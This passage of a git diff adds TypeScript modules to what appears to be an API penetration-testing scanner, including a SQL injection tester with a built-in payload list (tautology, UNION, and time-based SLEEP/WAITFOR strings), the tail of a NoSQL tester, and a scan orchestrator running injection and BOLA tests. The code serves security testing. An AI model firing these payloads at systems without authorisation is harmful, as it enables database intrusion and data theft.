+    // No vulnerability found
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      parameter: parameter.name,
+      type: "nosql",
+      vulnerable: false,
+    }
+  }
+
+  /**
+   * Test a specific payload.
+   */
+  async function testPayload(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    payload: string | object,
+    baseUrl: string,
+    headers: Record<string, string>,
+    timeout: number,
+    baselineResponse: TestResponse | null
+  ): Promise<ApiScanTypes.InjectionTestResult> {
+    const startTime = Date.now()
+    const response = await sendRequest(endpoint, parameter, payload, baseUrl, headers, timeout)
+    const responseTime = Date.now() - startTime
+
+    const payloadStr = typeof payload === "object" ? JSON.stringify(payload) : payload
+
+    // Check for NoSQL error patterns in response
+    if (response?.body) {
+      for (const pattern of NOSQL_ERROR_PATTERNS) {
+        if (pattern.test(response.body)) {
+          log.warn("NoSQL injection vulnerability detected (error-based)", {
+            endpoint: endpoint.path,
+            parameter: parameter.name,
+            payload: payloadStr,
+          })
+
+          return {
+            endpoint: endpoint.path,
+            method: endpoint.method,
+            parameter: parameter.name,
+            type: "nosql",
+            vulnerable: true,
+            payload: payloadStr,
+            evidence: `NoSQL error pattern matched: ${pattern}`,
+            responseTime,
+          }
+        }
+      }
+    }
+
+    // Authentication bypass detection
+    // If baseline was 401/403 but payload gives 200, likely vulnerable
+    if (baselineResponse && response) {
+      if (
+        (baselineResponse.status === 401 || baselineResponse.status === 403) &&
+        response.status === 200
+      ) {
+        log.warn("NoSQL injection vulnerability detected (auth bypass)", {
+          endpoint: endpoint.path,
+          parameter: parameter.name,
+        })
+
+        return {
+          endpoint: endpoint.path,
+          method: endpoint.method,
+          parameter: parameter.name,
+          type: "nosql",
+          vulnerable: true,
+          payload: payloadStr,
+          evidence: "Authentication bypass: unauthorized request succeeded with NoSQL payload",
+          responseTime,
+        }
+      }
+
+      // If response dramatically different (more data returned)
+      if (response.body.length > baselineResponse.body.length * 2) {
+        log.warn("Potential NoSQL injection (data leakage)", {
+          endpoint: endpoint.path,
+          parameter: parameter.name,
+        })
+
+        return {
+          endpoint: endpoint.path,
+          method: endpoint.method,
+          parameter: parameter.name,
+          type: "nosql",
+          vulnerable: true,
+          payload: payloadStr,
+          evidence: `Response size increased significantly (${baselineResponse.body.length} -> ${response.body.length} bytes)`,
+          responseTime,
+        }
+      }
+    }
+
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      parameter: parameter.name,
+      type: "nosql",
+      vulnerable: false,
+      responseTime,
+    }
+  }
+
+  /**
+   * Test response structure.
+   */
+  interface TestResponse {
+    status: number
+    body: string
+  }
+
+  /**
+   * Send a request with injected payload.
+   */
+  async function sendRequest(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    value: string | object,
+    baseUrl: string,
+    headers: Record<string, string>,
+    timeout: number
+  ): Promise<TestResponse | null> {
+    try {
+      let url = new URL(endpoint.path, baseUrl)
+      let body: string | undefined
+
+      const valueStr = typeof value === "object" ? JSON.stringify(value) : value
+
+      // Inject based on parameter location
+      switch (parameter.in) {
+        case "query":
+          // For query params, try both string and object injection
+          url.searchParams.set(parameter.name, valueStr)
+          // Also try nested object notation
+          if (typeof value === "object") {
+            Object.entries(value).forEach(([k, v]) => {
+              url.searchParams.set(`${parameter.name}[${k}]`, String(v))
+            })
+          }
+          break
+        case "path":
+          url = new URL(endpoint.path.replace(`{${parameter.name}}`, encodeURIComponent(valueStr)), baseUrl)
+          break
+        case "body":
+          // For body, inject as nested object structure
+          if (typeof value === "object") {
+            body = JSON.stringify({ [parameter.name]: value })
+          } else {
+            try {
+              // Try to parse string as JSON for object injection
+              const parsed = JSON.parse(valueStr)
+              body = JSON.stringify({ [parameter.name]: parsed })
+            } catch {
+              body = JSON.stringify({ [parameter.name]: valueStr })
+            }
+          }
+          headers["Content-Type"] = "application/json"
+          break
+      }
+
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url.toString(), {
+        method: endpoint.method,
+        headers: {
+          Accept: "application/json",
+          ...headers,
+        },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      const responseBody = await response.text()
+      return { status: response.status, body: responseBody }
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Build auth headers from config.
+   */
+  function buildAuthHeaders(auth?: ApiScanTypes.AuthConfig): Record<string, string> {
+    if (!auth) return {}
+
+    switch (auth.type) {
+      case "bearer":
+      case "jwt":
+        return auth.token ? { Authorization: `Bearer ${auth.token}` } : {}
+      case "basic":
+        if (auth.basic) {
+          const credentials = Buffer.from(`${auth.basic.username}:${auth.basic.password}`).toString("base64")
+          return { Authorization: `Basic ${credentials}` }
+        }
+        return {}
+      case "apikey":
+        if (auth.apiKey) {
+          return { [auth.apiKey.header]: auth.apiKey.value }
+        }
+        return {}
+      default:
+        return {}
+    }
+  }
+
+  /**
+   * Find parameters likely vulnerable to NoSQL injection.
+   *
+   * @param endpoint - Endpoint to analyze
+   * @returns Parameters to test
+   */
+  export function findTestableParameters(endpoint: ApiScanTypes.ApiEndpoint): ApiScanTypes.ApiParameter[] {
+    const testable: ApiScanTypes.ApiParameter[] = []
+
+    // NoSQL injection target patterns
+    const targetPatterns = [
+      /id$/i,
+      /user/i,
+      /email/i,
+      /name/i,
+      /search/i,
+      /query/i,
+      /filter/i,
+      /password/i,
+      /login/i,
+      /token/i,
+    ]
+
+    for (const param of endpoint.parameters) {
+      // Skip header parameters
+      if (param.in === "header" || param.in === "cookie") continue
+
+      // Check if parameter name matches patterns
+      for (const pattern of targetPatterns) {
+        if (pattern.test(param.name)) {
+          testable.push(param)
+          break
+        }
+      }
+
+      // Include body parameters (common for NoSQL injection)
+      if (param.in === "body" && !testable.includes(param)) {
+        testable.push(param)
+      }
+
+      // Include string query parameters
+      if (param.in === "query" && param.type === "string" && !testable.includes(param)) {
+        testable.push(param)
+      }
+    }
+
+    return testable
+  }
+
+  /**
+   * Format test result for display.
+   */
+  export function format(result: ApiScanTypes.InjectionTestResult): string {
+    const lines: string[] = []
+
+    lines.push("NoSQL Injection Test")
+    lines.push("====================")
+    lines.push("")
+    lines.push(`Endpoint: ${result.method} ${result.endpoint}`)
+    lines.push(`Parameter: ${result.parameter}`)
+    lines.push(`Vulnerable: ${result.vulnerable ? "YES" : "NO"}`)
+
+    if (result.vulnerable) {
+      lines.push("")
+      lines.push(`Payload: ${result.payload}`)
+      lines.push(`Evidence: ${result.evidence}`)
+    }
+
+    if (result.responseTime) {
+      lines.push(`Response Time: ${result.responseTime}ms`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/injection/sql.ts b/packages/opencode/src/pentest/apiscan/injection/sql.ts
new file mode 100644
index 00000000000..2064a2062c3
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/injection/sql.ts
@@ -0,0 +1,427 @@
+/**
+ * @fileoverview SQL Injection Testing
+ *
+ * Tests API endpoints for SQL injection vulnerabilities
+ * using common payloads and detection techniques.
+ *
+ * @module pentest/apiscan/injection/sql
+ */
+
+import { ApiScanTypes } from "../types"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "apiscan.sqli" })
+
+/**
+ * SQL injection payloads for testing.
+ */
+const SQL_PAYLOADS = [
+  // Basic injection
+  "'",
+  "''",
+  '";',
+  "';",
+  "' OR '1'='1",
+  "' OR '1'='1'--",
+  "' OR '1'='1'/*",
+  '" OR "1"="1',
+  "1 OR 1=1",
+  "1' OR '1'='1",
+  // Error-based
+  "'INVALID",
+  "1'1",
+  "1 AND 1=1",
+  "1 AND 1=2",
+  // Time-based (careful with timeouts)
+  "'; WAITFOR DELAY '0:0:5'--",
+  "'; SELECT SLEEP(5)--",
+  "1; SELECT pg_sleep(5)--",
+  // Union-based
+  "' UNION SELECT NULL--",
+  "' UNION SELECT NULL,NULL--",
+  "1 UNION SELECT NULL",
+  // Blind boolean
+  "' AND '1'='1",
+  "' AND '1'='2",
+  "1 AND 1=1",
+  "1 AND 1=2",
+]
+
+/**
+ * SQL error patterns that indicate vulnerability.
+ */
+const SQL_ERROR_PATTERNS = [
+  /sql\s*syntax/i,
+  /mysql/i,
+  /postgresql/i,
+  /sqlite/i,
+  /oracle/i,
+  /microsoft\s*sql\s*server/i,
+  /mssql/i,
+  /mariadb/i,
+  /unclosed\s*quotation/i,
+  /quoted\s*string/i,
+  /syntax\s*error/i,
+  /unexpected\s*token/i,
+  /invalid\s*query/i,
+  /db\s*error/i,
+  /database\s*error/i,
+  /query\s*failed/i,
+  /sql\s*error/i,
+  /odbc/i,
+  /jdbc/i,
+  /ORA-\d{5}/i, // Oracle errors
+  /PG::/i, // PostgreSQL
+]
+
+/**
+ * SQL injection test options.
+ */
+export interface SqlInjectionOptions {
+  /** Authentication config */
+  auth?: ApiScanTypes.AuthConfig
+  /** Timeout per request in ms */
+  timeout?: number
+  /** Custom headers */
+  headers?: Record<string, string>
+  /** Payloads to test (defaults to built-in) */
+  payloads?: string[]
+  /** Enable time-based detection */
+  timeBased?: boolean
+}
+
+/**
+ * SQL injection tester namespace.
+ */
+export namespace SqlInjectionTester {
+  /**
+   * Test an endpoint parameter for SQL injection.
+   *
+   * @param endpoint - Endpoint to test
+   * @param parameter - Parameter to test
+   * @param baseUrl - Base URL
+   * @param options - Test options
+   * @returns Injection test result
+   */
+  export async function testParameter(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    baseUrl: string,
+    options: SqlInjectionOptions = {}
+  ): Promise<ApiScanTypes.InjectionTestResult> {
+    const {
+      auth,
+      timeout = 10000,
+      headers = {},
+      payloads = SQL_PAYLOADS,
+      timeBased = false,
+    } = options
+
+    log.info("Testing parameter for SQL injection", {
+      endpoint: endpoint.path,
+      parameter: parameter.name,
+      payloadCount: payloads.length,
+    })
+
+    // Build auth headers
+    const authHeaders = buildAuthHeaders(auth)
+
+    // Get baseline response
+    const baselineResponse = await sendRequest(
+      endpoint,
+      parameter,
+      "normalvalue",
+      baseUrl,
+      { ...headers, ...authHeaders },
+      timeout
+    )
+
+    // Test payloads
+    for (const payload of payloads) {
+      // Skip time-based payloads unless enabled
+      if (!timeBased && (payload.includes("SLEEP") || payload.includes("WAITFOR") || payload.includes("pg_sleep"))) {
+        continue
+      }
+
+      const result = await testPayload(
+        endpoint,
+        parameter,
+        payload,
+        baseUrl,
+        { ...headers, ...authHeaders },
+        timeout,
+        baselineResponse,
+        timeBased
+      )
+
+      if (result.vulnerable) {
+        return result
+      }
+    }
+
+    // No vulnerability found
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      parameter: parameter.name,
+      type: "sql",
+      vulnerable: false,
+    }
+  }
+
+  /**
+   * Test a specific payload.
+   */
+  async function testPayload(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    payload: string,
+    baseUrl: string,
+    headers: Record<string, string>,
+    timeout: number,
+    baselineResponse: TestResponse | null,
+    timeBased: boolean
+  ): Promise<ApiScanTypes.InjectionTestResult> {
+    const startTime = Date.now()
+    const response = await sendRequest(endpoint, parameter, payload, baseUrl, headers, timeout)
+    const responseTime = Date.now() - startTime
+
+    // Check for SQL error patterns in response
+    if (response?.body) {
+      for (const pattern of SQL_ERROR_PATTERNS) {
+        if (pattern.test(response.body)) {
+          log.warn("SQL injection vulnerability detected (error-based)", {
+            endpoint: endpoint.path,
+            parameter: parameter.name,
+            payload,
+          })
+
+          return {
+            endpoint: endpoint.path,
+            method: endpoint.method,
+            parameter: parameter.name,
+            type: "sql",
+            vulnerable: true,
+            payload,
+            evidence: `SQL error pattern matched: ${pattern}`,
+            responseTime,
+          }
+        }
+      }
+    }
+
+    // Time-based detection
+    if (timeBased && payload.includes("SLEEP") || payload.includes("WAITFOR") || payload.includes("pg_sleep")) {
+      if (responseTime > 4500) { // > 4.5s indicates sleep worked
+        log.warn("SQL injection vulnerability detected (time-based)", {
+          endpoint: endpoint.path,
+          parameter: parameter.name,
+          payload,
+          responseTime,
+        })
+
+        return {
+          endpoint: endpoint.path,
+          method: endpoint.method,
+          parameter: parameter.name,
+          type: "sql",
+          vulnerable: true,
+          payload,
+          evidence: `Response delayed ${responseTime}ms (expected ~5000ms delay)`,
+          responseTime,
+        }
+      }
+    }
+
+    // Boolean-based blind detection
+    if (baselineResponse && response) {
+      // Compare responses for boolean payloads
+      if (payload.includes("AND 1=1") || payload.includes("'1'='1")) {
+        const truePayload = payload
+        const falsePayload = payload.replace("1=1", "1=2").replace("'1'='1", "'1'='2")
+
+        const falseResponse = await sendRequest(endpoint, parameter, falsePayload, baseUrl, headers, timeout)
+
+        // If true payload returns normal response but false payload differs significantly
+        if (falseResponse && response.status === baselineResponse.status && falseResponse.status !== response.status) {
+          log.warn("SQL injection vulnerability detected (boolean-based)", {
+            endpoint: endpoint.path,
+            parameter: parameter.name,
+          })
+
+          return {
+            endpoint: endpoint.path,
+            method: endpoint.method,
+            parameter: parameter.name,
+            type: "sql",
+            vulnerable: true,
+            payload,
+            evidence: "Boolean-based blind SQL injection: different responses for true/false conditions",
+            responseTime,
+          }
+        }
+      }
+    }
+
+    return {
+      endpoint: endpoint.path,
+      method: endpoint.method,
+      parameter: parameter.name,
+      type: "sql",
+      vulnerable: false,
+      responseTime,
+    }
+  }
+
+  /**
+   * Test response structure.
+   */
+  interface TestResponse {
+    status: number
+    body: string
+  }
+
+  /**
+   * Send a request with injected payload.
+   */
+  async function sendRequest(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    parameter: ApiScanTypes.ApiParameter,
+    value: string,
+    baseUrl: string,
+    headers: Record<string, string>,
+    timeout: number
+  ): Promise<TestResponse | null> {
+    try {
+      let url = new URL(endpoint.path, baseUrl)
+      let body: string | undefined
+
+      // Inject based on parameter location
+      switch (parameter.in) {
+        case "query":
+          url.searchParams.set(parameter.name, value)
+          break
+        case "path":
+          url = new URL(endpoint.path.replace(`{${parameter.name}}`, encodeURIComponent(value)), baseUrl)
+          break
+        case "body":
+          body = JSON.stringify({ [parameter.name]: value })
+          headers["Content-Type"] = "application/json"
+          break
+        case "header":
+          headers[parameter.name] = value
+          break
+      }
+
+      const controller = new AbortController()
+      const timeoutId = setTimeout(() => controller.abort(), timeout)
+
+      const response = await fetch(url.toString(), {
+        method: endpoint.method,
+        headers: {
+          Accept: "application/json",
+          ...headers,
+        },
+        body,
+        signal: controller.signal,
+      })
+
+      clearTimeout(timeoutId)
+
+      const responseBody = await response.text()
+      return { status: response.status, body: responseBody }
+    } catch {
+      return null
+    }
+  }
+
+  /**
+   * Build auth headers from config.
+   */
+  function buildAuthHeaders(auth?: ApiScanTypes.AuthConfig): Record<string, string> {
+    if (!auth) return {}
+
+    switch (auth.type) {
+      case "bearer":
+      case "jwt":
+        return auth.token ? { Authorization: `Bearer ${auth.token}` } : {}
+      case "basic":
+        if (auth.basic) {
+          const credentials = Buffer.from(`${auth.basic.username}:${auth.basic.password}`).toString("base64")
+          return { Authorization: `Basic ${credentials}` }
+        }
+        return {}
+      case "apikey":
+        if (auth.apiKey) {
+          return { [auth.apiKey.header]: auth.apiKey.value }
+        }
+        return {}
+      default:
+        return {}
+    }
+  }
+
+  /**
+   * Find parameters likely vulnerable to SQL injection.
+   *
+   * @param endpoint - Endpoint to analyze
+   * @returns Parameters to test
+   */
+  export function findTestableParameters(endpoint: ApiScanTypes.ApiEndpoint): ApiScanTypes.ApiParameter[] {
+    const testable: ApiScanTypes.ApiParameter[] = []
+
+    // SQL injection target patterns
+    const targetPatterns = [/id$/i, /name/i, /search/i, /query/i, /filter/i, /sort/i, /order/i, /limit/i, /offset/i, /where/i, /user/i, /email/i, /login/i]
+
+    for (const param of endpoint.parameters) {
+      // Skip header parameters (less common for SQLi)
+      if (param.in === "header" || param.in === "cookie") continue
+
+      // Check if parameter name matches patterns
+      for (const pattern of targetPatterns) {
+        if (pattern.test(param.name)) {
+          testable.push(param)
+          break
+        }
+      }
+
+      // Include path parameters (often used in queries)
+      if (param.in === "path" && !testable.includes(param)) {
+        testable.push(param)
+      }
+
+      // Include string/number query parameters
+      if (param.in === "query" && ["string", "number", "integer"].includes(param.type) && !testable.includes(param)) {
+        testable.push(param)
+      }
+    }
+
+    return testable
+  }
+
+  /**
+   * Format test result for display.
+   */
+  export function format(result: ApiScanTypes.InjectionTestResult): string {
+    const lines: string[] = []
+
+    lines.push("SQL Injection Test")
+    lines.push("==================")
+    lines.push("")
+    lines.push(`Endpoint: ${result.method} ${result.endpoint}`)
+    lines.push(`Parameter: ${result.parameter}`)
+    lines.push(`Vulnerable: ${result.vulnerable ? "YES" : "NO"}`)
+
+    if (result.vulnerable) {
+      lines.push("")
+      lines.push(`Payload: ${result.payload}`)
+      lines.push(`Evidence: ${result.evidence}`)
+    }
+
+    if (result.responseTime) {
+      lines.push(`Response Time: ${result.responseTime}ms`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/apiscan/orchestrator.ts b/packages/opencode/src/pentest/apiscan/orchestrator.ts
new file mode 100644
index 00000000000..bec2be03aae
--- /dev/null
+++ b/packages/opencode/src/pentest/apiscan/orchestrator.ts
@@ -0,0 +1,544 @@
+/**
+ * @fileoverview API Scan Orchestrator
+ *
+ * Coordinates API security scanning by combining discovery,
+ * authentication testing, authorization testing, and injection testing.
+ *
+ * @module pentest/apiscan/orchestrator
+ */
+
+import { randomBytes } from "crypto"
+import { ApiScanTypes } from "./types"
+import { ApiScanEvents } from "./events"
+import { ApiScanStorage } from "./storage"
+import type { StorageConfig } from "./storage"
+import { ApiScanProfiles } from "./profiles"
+import { ApiDiscovery } from "./discovery"
+import { JwtAnalyzer } from "./auth/jwt"
+import { BolaDetector } from "./authz/bola"
+import { SqlInjectionTester } from "./injection/sql"
+import { NoSqlInjectionTester } from "./injection/nosql"
+import { CommandInjectionTester } from "./injection/command"
+import { Findings } from "../findings"
+import { PentestTypes } from "../types"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "apiscan.orchestrator" })
+
+/**
+ * Scan options.
+ */
+export interface ScanOptions {
+  /** Scan profile or profile ID */
+  profile?: ApiScanTypes.ProfileId | ApiScanTypes.ScanProfile
+  /** Pre-discovered API spec */
+  spec?: ApiScanTypes.ApiSpec
+  /** Spec URL to fetch */
+  specUrl?: string
+  /** Authentication configuration */
+  auth?: ApiScanTypes.AuthConfig
+  /** Session ID for findings */
+  sessionId?: string
+  /** Storage configuration */
+  storage?: StorageConfig
+  /** Custom headers for requests */
+  headers?: Record<string, string>
+}
+
+/**
+ * API scan orchestrator namespace.
+ */
+export namespace ApiScanOrchestrator {
+  /**
+   * Run an API security scan.
+   *
+   * @param target - Target URL
+   * @param options - Scan options
+   * @returns Scan result
+   */
+  export async function scan(target: string, options: ScanOptions = {}): Promise<ApiScanTypes.ApiScanResult> {
+    const startTime = Date.now()
+    const scanId = generateScanId()
+
+    // Get profile
+    const profile = resolveProfile(options.profile)
+
+    log.info("Starting API scan", { scanId, target, profile: profile.id })
+
+    // Initialize scan result
+    const result: ApiScanTypes.ApiScanResult = {
+      id: scanId,
+      target,
+      profile: profile.id,
+      auth: options.auth,
+      endpoints: [],
+      findings: [],
+      stats: {
+        endpointsDiscovered: 0,
+        endpointsScanned: 0,
+        endpointsVulnerable: 0,
+        authTestsRun: 0,
+        injectionTestsRun: 0,
+        bolaTestsRun: 0,
+        findingsCount: 0,
+        criticalCount: 0,
+        highCount: 0,
+        mediumCount: 0,
+        lowCount: 0,
+        infoCount: 0,
+        duration: 0,
+      },
+      startedAt: startTime,
+      status: "running",
+    }
+
+    try {
+      // Save initial state
+      await ApiScanStorage.saveScan(result, options.storage)
+
+      // Step 1: Discover or use provided spec
+      let spec: ApiScanTypes.ApiSpec | undefined = options.spec
+
+      if (!spec && profile.discovery.enabled) {
+        await Bus.publish(ApiScanEvents.ScanStarted, {
+          scanID: scanId,
+          target,
+          profile: profile.id,
+          endpointCount: 0,
+        })
+
+        const discoveryResult = await ApiDiscovery.discover(target, {
+          parseOpenApi: profile.discovery.parseOpenApi,
+          parseGraphQL: profile.discovery.parseGraphQL,
+          commonPaths: profile.discovery.commonPaths,
+          specUrl: options.specUrl,
+          headers: options.headers,
+          storage: options.storage,
+        })
+
+        if (discoveryResult.success && discoveryResult.spec) {
+          spec = discoveryResult.spec
+          result.specId = spec.id
+        }
+      } else if (options.specUrl) {
+        // Fetch spec from URL
+        spec = await ApiDiscovery.fetchSpec(
+          options.specUrl,
+          options.specUrl.includes("graphql") ? "graphql" : "openapi",
+          target,
+          { headers: options.headers, storage: options.storage }
+        )
+        result.specId = spec.id
+      }
+
+      if (!spec) {
+        throw new Error("No API specification found and discovery failed")
+      }
+
+      result.stats.endpointsDiscovered = spec.endpoints.length
+
+      // Publish scan started with endpoint count
+      await Bus.publish(ApiScanEvents.ScanStarted, {
+        scanID: scanId,
+        target,
+        profile: profile.id,
+        endpointCount: spec.endpoints.length,
+      })
+
+      // Step 2: JWT Analysis (if token provided)
+      if (profile.authTests.enabled && profile.authTests.jwtAnalysis && options.auth?.token) {
+        result.stats.authTestsRun++
+
+        try {
+          const jwtAnalysis = JwtAnalyzer.analyze(options.auth.token)
+          result.jwtAnalysis = jwtAnalysis
+
+          // Create findings for JWT issues
+          for (const issue of jwtAnalysis.issues) {
+            const severity = issue.startsWith("CRITICAL") ? "critical" : issue.startsWith("WARNING") ? "medium" : "low"
+            const finding = await createFinding({
+              title: `JWT Issue: ${issue.split(":")[1]?.trim() || issue}`,
+              description: issue,
+              severity,
+              category: "authentication",
+              target,
+              sessionId: options.sessionId,
+              storage: options.storage,
+            })
+            result.findings.push(finding.id)
+            incrementSeverityCount(result.stats, severity)
+          }
+
+          await Bus.publish(ApiScanEvents.AuthTested, {
+            scanID: scanId,
+            authType: "jwt",
+            issuesFound: jwtAnalysis.issues.length,
+            attackVectors: jwtAnalysis.attackVectors,
+          })
+        } catch (err) {
+          log.warn("JWT analysis failed", { error: (err as Error).message })
+        }
+      }
+
+      // Step 3: Test endpoints
+      for (const endpoint of spec.endpoints) {
+        const endpointResult = await testEndpoint(endpoint, target, profile, options, scanId)
+        result.endpoints.push(endpointResult)
+        result.stats.endpointsScanned++
+
+        if (endpointResult.findings.length > 0) {
+          result.stats.endpointsVulnerable++
+          result.findings.push(...endpointResult.findings)
+        }
+
+        // Update stats from endpoint
+        result.stats.injectionTestsRun += endpointResult.injectionVulnerable !== undefined ? 1 : 0
+        result.stats.bolaTestsRun += endpointResult.bolaVulnerable !== undefined ? 1 : 0
+
+        await Bus.publish(ApiScanEvents.EndpointTested, {
+          scanID: scanId,
+          endpointId: endpointResult.endpointId,
+          path: endpoint.path,
+          method: endpoint.method,
+          findingsCount: endpointResult.findings.length,
+        })
+
+        // Update saved result periodically
+        await ApiScanStorage.saveScan(result, options.storage)
+      }
+
+      // Complete scan
+      result.status = "completed"
+      result.completedAt = Date.now()
+      result.stats.duration = result.completedAt - startTime
+      result.stats.findingsCount = result.findings.length
+
+      await Bus.publish(ApiScanEvents.ScanCompleted, {
+        scanID: scanId,
+        target,
+        profile: profile.id,
+        endpointsScanned: result.stats.endpointsScanned,
+        findingsCount: result.stats.findingsCount,
+        duration: result.stats.duration,
+        status: "completed",
+      })
+    } catch (err) {
+      result.status = "failed"
+      result.error = (err as Error).message
+      result.completedAt = Date.now()
+      result.stats.duration = result.completedAt - startTime
+
+      await Bus.publish(ApiScanEvents.ScanFailed, {
+        scanID: scanId,
+        target,
+        error: result.error,
+      })
+
+      log.error("API scan failed", { scanId, error: result.error })
+    }
+
+    // Save final result
+    await ApiScanStorage.saveScan(result, options.storage)
+
+    log.info("API scan complete", {
+      scanId,
+      status: result.status,
+      findingsCount: result.stats.findingsCount,
+      duration: result.stats.duration,
+    })
+
+    return result
+  }
+
+  /**
+   * Test a single endpoint.
+   */
+  async function testEndpoint(
+    endpoint: ApiScanTypes.ApiEndpoint,
+    baseUrl: string,
+    profile: ApiScanTypes.ScanProfile,
+    options: ScanOptions,
+    scanId: string
+  ): Promise<ApiScanTypes.EndpointTestResult> {
+    const startTime = Date.now()
+    const findings: string[] = []
+
+    let bolaVulnerable: boolean | undefined
+    let injectionVulnerable: boolean | undefined
+
+    // BOLA Testing
+    if (profile.bolaTests && options.auth) {
+      const vulnerableEndpoints = BolaDetector.findVulnerableEndpoints([endpoint])
+      if (vulnerableEndpoints.length > 0) {
+        // Find an ID in the path
+        const pathMatch = endpoint.path.match(/\{(\w*[Ii]d\w*)\}/)
+        if (pathMatch) {
+          const testIds = BolaDetector.generateTestIds("1", "numeric", 5)
+          const bolaResult = await BolaDetector.testEndpoint(endpoint, baseUrl, "1", {
+            victimAuth: options.auth,
+            testIds,
+            headers: options.headers,
+            timeout: profile.timeout,
+          })
+
+          bolaVulnerable = bolaResult.vulnerable
+
+          if (bolaResult.vulnerable) {
+            const finding = await createFinding({
+              title: `BOLA/IDOR: ${endpoint.method} ${endpoint.path}`,
+              description: `Endpoint allows access to other users' resources. Accessible IDs: ${bolaResult.accessibleIds.join(", ")}`,
+              severity: "high",
+              category: "authorization",
+              target: baseUrl,
+              path: endpoint.path,
+              sessionId: options.sessionId,
+              storage: options.storage,
+            })
+            findings.push(finding.id)
+
+            await Bus.publish(ApiScanEvents.VulnerabilityFound, {
+              scanID: scanId,
+              findingID: finding.id,
+              type: "BOLA",
+              severity: "high",
+              endpoint: endpoint.path,
+            })
+          }
+        }
+      }
+    }
+
+    // Injection Testing
+    if (profile.injectionTests.enabled) {
+      const testableParams = endpoint.parameters.filter(
+        (p) => p.in === "query" || p.in === "body" || p.in === "path"
+      )
+
+      for (const param of testableParams) {
+        // SQL Injection
+        if (profile.injectionTests.sql) {
+          const sqlResult = await SqlInjectionTester.testParameter(endpoint, param, baseUrl, {
+            auth: options.auth,
+            headers: options.headers,
+            timeout: profile.timeout,
+          })
+
+          if (sqlResult.vulnerable) {
+            injectionVulnerable = true
+            const finding = await createFinding({
+              title: `SQL Injection: ${endpoint.method} ${endpoint.path} (${param.name})`,
+              description: `Parameter ${param.name} is vulnerable to SQL injection. Payload: ${sqlResult.payload}`,
+              severity: "critical",
+              category: "injection",
+              target: baseUrl,
+              path: endpoint.path,
+              sessionId: options.sessionId,
+              storage: options.storage,
+            })
+            findings.push(finding.id)
+
+            await Bus.publish(ApiScanEvents.VulnerabilityFound, {
+                scanID: scanId,
+                findingID: finding.id,
+                type: "SQLi",
+                severity: "critical",
+                endpoint: endpoint.path,
+            })
+
+            await Bus.publish(ApiScanEvents.InjectionTested, {
+                scanID: scanId,
+                endpoint: endpoint.path,
+                type: "sql",
+                vulnerable: true,
+            })
+          }
+        }
+
+        // NoSQL Injection
+        if (profile.injectionTests.nosql) {
+          const nosqlResult = await NoSqlInjectionTester.testParameter(endpoint, param, baseUrl, {
+            auth: options.auth,
+            headers: options.headers,
+            timeout: profile.timeout,
+          })
+
+          if (nosqlResult.vulnerable) {
+            injectionVulnerable = true
+            const finding = await createFinding({
+              title: `NoSQL Injection: ${endpoint.method} ${endpoint.path} (${param.name})`,
+              description: `Parameter ${param.name} is vulnerable to NoSQL injection. Payload: ${nosqlResult.payload}`,
+              severity: "critical",
+              category: "injection",
+              target: baseUrl,
+              path: endpoint.path,
+              sessionId: options.sessionId,
+              storage: options.storage,
+            })
+            findings.push(finding.id)
+
+            await Bus.publish(ApiScanEvents.VulnerabilityFound, {
+                scanID: scanId,
+                findingID: finding.id,
+                type: "NoSQLi",
+                severity: "critical",
+                endpoint: endpoint.path,
+            })
+
+            await Bus.publish(ApiScanEvents.InjectionTested, {
+                scanID: scanId,
+                endpoint: endpoint.path,
+                type: "nosql",
+                vulnerable: true,
+            })
+          }
+        }
+
+        // Command Injection
+        if (profile.injectionTests.command) {
+          const cmdResult = await CommandInjectionTester.testParameter(endpoint, param, baseUrl, {
+            auth: options.auth,
+            headers: options.headers,
+            timeout: profile.timeout,
+          })
+
+          if (cmdResult.vulnerable) {
+            injectionVulnerable = true
+            const finding = await createFinding({
+              title: `Command Injection: ${endpoint.method} ${endpoint.path} (${param.name})`,
+              description: `Parameter ${param.name} is vulnerable to command injection. Payload: ${cmdResult.payload}`,
+              severity: "critical",
+              category: "injection",
+              target: baseUrl,
+              path: endpoint.path,
+              sessionId: options.sessionId,
+              storage: options.storage,
+            })
+            findings.push(finding.id)
+
+            await Bus.publish(ApiScanEvents.VulnerabilityFound, {
+                scanID: scanId,
+                findingID: finding.id,
+                type: "CommandInjection",
+                severity: "critical",
+                endpoint: endpoint.path,
+            })
+
+            await Bus.publish(ApiScanEvents.InjectionTested, {
+                scanID: scanId,
+                endpoint: endpoint.path,
+                type: "command",
+                vulnerable: true,
+            })
+          }
+        }
+      }
+    }
+
+    return {
+      endpointId: endpoint.id,
+      path: endpoint.path,
+      method: endpoint.method,
+      authRequired: !!endpoint.security?.length,
+      bolaVulnerable,
+      injectionVulnerable,
+      findings,
+      testedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate a unique scan ID.
+   */
+  function generateScanId(): string {
+    const timestamp = Date.now().toString(36)
+    const random = randomBytes(6).toString("hex")
+    return `apiscan_${timestamp}_${random}`
+  }
+
+  /**
+   * Resolve profile from ID or object.
+   */
+  function resolveProfile(
+    profile?: ApiScanTypes.ProfileId | ApiScanTypes.ScanProfile
+  ): ApiScanTypes.ScanProfile {
+    if (!profile) {
+      return ApiScanProfiles.Standard
+    }
+    if (typeof profile === "string") {
+      return ApiScanProfiles.get(profile) || ApiScanProfiles.Standard
+    }
+    return profile
+  }
+
+  /**
+   * Create a security finding.
+   */
